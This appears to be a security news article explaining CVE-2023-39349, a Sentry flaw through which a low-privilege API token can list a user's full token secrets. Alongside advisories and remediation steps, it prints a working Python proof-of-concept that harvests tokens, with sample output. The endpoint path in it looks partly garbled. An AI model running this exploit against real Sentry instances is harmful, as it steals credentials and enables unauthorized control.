CVE CyberSecurity Database News

CVE-2023-39349 - Sentry Token Exposure Vulnerability Explained

Poster -

Sentry is a popular platform for error tracking and performance monitoring used in many modern applications. It helps developers quickly understand where, when, and why their code is failing. In 2023, a vulnerability was discovered in Sentry that could expose sensitive authentication tokens, putting systems at risk. In this article, we'll break down CVE-2023-39349, explain how the exploit works, show you sample code, and provide remediation steps.

What is CVE-2023-39349?

CVE-2023-39349 is a security flaw affecting Sentry from version 22.1. up to (but not including) 23.7.2. This bug allows an attacker—who only needs access to a *low-privilege API token*—to list all the API tokens associated with a user. This includes tokens with higher privileges, which could then be used to carry out malicious actions.

Official Advisory:
https://nvd.nist.gov/vuln/detail/CVE-2023-39349
https://github.com/getsentry/sentry/security/advisories/GHSA-c7qg-wx94-6vxr

How Bad is It?

- Who’s affected: Anyone running Sentry between versions 22.1. and before 23.7.2 (including self-hosted).
- What’s exposed: All API tokens for a user, even those with more permissions/scopes than the attacker’s original token.
- Impact: Unauthorized actions and data access in Sentry, including potentially project deletions, configuration changes, and data exfiltration.

Vulnerability Details

The vulnerability lies in how the Sentry API endpoint /api//api-tokens/ handles authentication and authorization. An attacker can use a token with minimal or no scopes to enumerate all tokens belonging to the user—the response includes the tokens' actual secrets.

Attacker obtains a very basic or scope-less API token for Sentry.

2. Attacker sends a GET request to /api//api-tokens/.

Exploit Example

Below is a step-by-step demonstration using Python's popular requests library. Make sure you only test this on your own test instance:

import requests

# Step 1: Use a low-privilege token
headers = {
    "Authorization": "Bearer <LOW_PRIV_TOKEN>"
}

# Step 2: Query the vulnerable endpoint
url = "https://your-sentry-instance/api//api-tokens/";
response = requests.get(url, headers=headers)

# Step 3: Parse and print all returned tokens
if response.status_code == 200:
    tokens = response.json()
    for token in tokens:
        print(f"Token: {token['token']}, Scopes: {token['scopes']}")
else:
    print("Request failed:", response.content)

Sample Output

Token: abcdef123456, Scopes: ['project:read']
Token: fedcba654321, Scopes: ['project:write', 'project:admin']
# ...and so on

The attacker could then reuse any of these tokens (for example, fedcba654321) to perform administrative or sensitive actions.

Is sentry.io affected?

No. According to the official advisory, there is *no evidence* this issue was exploited on sentry.io (the hosted Sentry service).

Upgrade to Sentry 23.7.2 or later. The latest version contains the security patch.

- Rotate all user auth tokens in your self-hosted Sentry instance. This ensures tokens potentially revealed are no longer usable.
- Monitor your logs for unrecognized access to /api//api-tokens/.

No Known Workarounds

There’s no reliable workaround; upgrading and rotating tokens is the only way to ensure safety.

- Security Advisory on GitHub
- Upgrade Instructions for Sentry
- CVE Report on NVD

Conclusion

CVE-2023-39349 is an example of why authentication and authorization boundaries need constant rechecking in API design. Even if you believe low-privilege tokens are harmless, a single endpoint can break the model and expose your system.
Act now—update and rotate your tokens to keep Sentry secure!


*If you run Sentry self-hosted, please check your version and take action today.*

Timeline

Published on: 08/07/2023 19:15:00 UTC
Last modified on: 08/10/2023 17:04:00 UTC